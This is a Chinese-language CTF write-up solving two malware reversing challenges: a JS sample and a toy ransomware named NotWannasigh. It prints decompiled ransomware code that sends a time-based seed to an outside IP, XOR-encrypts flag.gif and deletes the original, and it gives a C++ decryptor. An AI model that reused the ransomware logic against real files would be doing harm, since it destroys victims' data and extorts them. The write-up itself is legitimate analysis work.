这次的比赛只有两道re,全都是malware,不难,也还挺有意思
danger-Live-and-Malicious-Code 病毒的代码里面混进了flag,js的语法也不是特别懂,发现了很多处理字符串的函数,所以干脆console.log都输出了出来,发现输出的url中间夹了flag
1 WPI {Oh_nose_procoding_detected}
NotWannasigh 首先看下ransom note
1 2 3 4 Haha! Your precious file flag.gif has been encrypted by my new and improved ransomware NotWannasigh! You must send bitcoin to "bitpay.com/83768" to get the decryption key. You should act fast because in 48 hours I will delete the key. Muahahahaha! - def-not -h4ckah (Hi, CTF challenge creator here. You should _NEVER_ pay the ransom. If you send bitcoin to that BTC wallet then you will ONLY be donating to charity (and hey, that's really nice of you, Mental Health Hackers is a great organization). I will NOT send you the decryption key)
题目中所给的flag-gif.EnCiPhErEd应该就是加密过的文件,解密就可以得到flag,给的流量包暂时不知道作用是什么,干脆先看看程序的实现
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 *(_QWORD *)seed = time (0LL ); srand (seed[0 ]); fd = socket (2 , 1 , 0 ); if ( fd == -1 ) { puts ("could not create socket" ); } else { puts ("created socket" ); *(_DWORD *)&addr.sa_data[2 ] = inet_addr ("108.61.127.136" ); addr.sa_family = 2 ; *(_WORD *)addr.sa_data = htons (0x50 u); if ( connect (fd, &addr, 0x10 u) >= 0 ) { puts ("connected" ); sprintf (&s, "%d" , *(_QWORD *)seed); if ( send (fd, &s, 0xA uLL, 0 ) >= 0 ) puts ("sent" ); else puts ("send failed" ); } else { puts ("connect error" ); } }
先根据当前时间生成了一个随机数种子,然后进行通信,把这个种子发给了一个ip,这个种子肯定是后面生成随机数用的,所以肯定是有用的,这也就是流量包的作用,根据流量信息可以获得这个随机数种子的值1585599106
下面生成了一个随机数序列
1 2 3 4 5 6 7 8 9 10 11 12 13 14 puts ("targetting flag.gif" );stream = fopen ("flag.gif" , "r+" ); fseek (stream, 0LL , 2 );v19 = ftell (stream); fseek (stream, 0LL , 0 );printf ("fileSize = %d\n" , (unsigned int )v19);v18 = v19 - 1LL ; v8 = v19; v9 = 0LL ; v3 = alloca (16 * ((v19 + 15LL ) / 0x10 uLL)); v17 = &v6; for ( i = 0 ; i < v19; ++i ) *((_BYTE *)v17 + i) = rand (); puts ("key generated by 256" );
生成了key,下面是加密过程
1 2 3 4 5 6 7 8 9 10 11 12 13 for ( j = 0 ; ; ++j ) { v14 = fgetc (stream); if ( j >= v19 ) break ; *((_BYTE *)v15 + j) = v14 ^ *((_BYTE *)v17 + j); } fclose (stream); remove ("flag.gif" ); v13 = fopen ("flag-gif.EnCiPhErEd" , "w+" ); for ( k = 0 ; k < v19; ++k ) fputc (*((unsigned __int8 *)v15 + k), v13); fclose (v13);
简单异或之后写入文件,所以生成随机数序列之后再异或回来就好了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 #include <iostream> #include <cstdio> using namespace std;int main () srand (1585599106 ); FILE *s = fopen ("../flag-gif.EnCiPhErEd" , "r" ); int index = 0 ; FILE *f = fopen ("../flag.gif" , "w+" ); while (!feof (s)) { int uVar1 = rand ()&0xff ; int8_t tmp2=fgetc (s); int8_t tmp = uVar1 ^ tmp2; fputc (tmp, f); index = (int32_t )index + 1 ; } fclose (s); fclose (f); return 0 ; }
这个脚本要在linux下跑,因为win的随机数生成的不一样
得到了含有flag的gif
flag有点难读,第一遍还读错了一位
1 WPI{It_always_feels_a_little _weird_writing_malware}
Comments